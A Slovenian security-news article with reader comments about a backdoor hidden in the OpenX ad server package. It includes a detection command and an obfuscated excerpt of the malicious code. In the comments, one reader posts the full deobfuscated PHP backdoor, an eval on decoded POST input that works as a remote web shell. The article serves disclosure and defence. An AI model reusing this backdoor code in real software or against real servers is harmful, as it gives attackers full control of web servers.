» »

OpenX vsebuje stranska vrata

OpenX vsebuje stranska vrata

Heise - Trenutna različica strežniške programske opreme za posredovanje oglasov OpenX 2.10 vsebuje stranska vrata, ki se aktivno uporabljajo za napade na strežniške sisteme. Stranska vrata omogočajo izvajanje poljubne PHP kode. Administratorji OpenX-a so odstranili prizadete pakete s svojih strežnikov in se trenutno še ukvarjajo z rešitvijo. Heiko Weber je pri "rutinski kontroli" enega od oglasnih strežnikov odkril nenavadne vnose v dnevniške zapise in v nadaljevanju odkril stranska vrata v izvorni kodi OpenX. Svoje odkritje je posredoval varnostnemu oddelku spletne strani Heise, ki so obstoj stranskih vrat tudi potrdili.

Obstoj stranskih vrat lahko administratorji preverijo z ukazom:
find . -name \*.js -exec grep -l '<?php' {} \;

V primeru, da nam sistem vrne ime datoteke gre tu za datoteko JavaScript, ki vsebuje s komentarji zapleteno (obfuscated) PHP kodo:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2'; 
*/$j='ex'./**/'plode'; /* if(this.className ...

Datoteka se aktivira s pozivom require_once(), sam poziv pa je možno sprožiti oddaljeno preko URL-ja. Sama zlonamerna koda se nahaja v stisnjeni datoteki (zip) s časovnim žigom 12.9.2012, ki se ekstrahira pri namestitvi programskega paketa:

openx-2.8.10/etc/plugins/openXVideoAds.zip 
     md5: 6b3459f16238aa717f379565650cb0cf  

Napadalci uporabijo stranska vrata za vzpostavitev PHP ukazne lupine v /www/images/debugs.php, s čimer si lahko pridobijo popoln nadzor nad spletnim strežnikom.

Priporočamo pregled logov in odstranitev OpenX, dokler zadeva ni rešena!

10 komentarjev

FireSnake ::

Dobro spisano ....
"In The Sound Of Silence Time Is Standing Still"
Poglej, in se nasmej ----> www.vicmaher.si ;)

wungad ::

Men je tud všeč:D
.

čuhalev ::

<?php
$j='explode';
$_=$j(",",'strrev,str_rot13,vastPlayer');
eval ( $_[1]($_[0]( $_POST[$_[2]])) );

Tole je vsa zlobna™ koda ;)

techfreak :) ::

Kako točno lahko izkoristiš ta back door? V javascript datoteki imaš php kodo, ki se pa tako ne izvede ... torej sploh ni ranljivosti?

Isotropic ::

MrStein ::

FireSnake je izjavil:

Dobro spisano ....

Heh, jaz sem pa ravno obratno pomislil: dobra vsebina, a slabo/površno napisano.
Teštiram če delaž - umlaut dela: ä ?

techfreak :) ::

Nisem našel ... prav tako nisem našel več informacij o tem backdooru v angleščini. Ugotovil sem da so nekje uporabili require_once(), še vseeno pa mi to ne pove veliko.

Zgodovina sprememb…

Isotropic ::

jah nasel ga je nek nemec, tako da ocitno se ni prislo do usa medijev. prevedi si z g translate.

techfreak :) ::

Glede na prevod je tole na heise.de samo neke vrste povzetek oz. ne piše natančno kaj vse je še bilo spremenljeno poleg te JS datoteke. Novico sem že nekaj 2 dni nazaj zasledil v angleščini samo še vseeno ni nič kaj več ni pisalo kot tukaj.

Zgodovina sprememb…

vbohinc ::

Openx Source 2.8.11 Security Update, če vas zanima več... vsebuje tudi navodila, kako odstraniti stranska vrata iz obstoječe inštalacije.
Human nature is not a machine to be built after a model, and set to
do exactly the work prescribed for it, but a tree, which requires to grow
and develop itself on all sides...


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

OpenX vsebuje stranska vrata

Oddelek: Novice / Varnost
102477 (1579) vbohinc
»

Odkrita stranska vrata v HP MSA2000 G3

Oddelek: Novice / Varnost
113137 (2364) Poldi112
»

Ali bo Vista SP1 vseboval stranska vrata za NSA?

Oddelek: Novice / Ostala programska oprema
332435 (2435) cryptozaver
»

Microsoft: "Vista ne bo imela stranskih vrat"

Oddelek: Novice / Zasebnost
463406 (1894) Mr.B
»

Poiskus vgraditve stranskih vrat v Linux

Oddelek: Novice / Varnost
191851 (1851) andrej

Več podobnih tem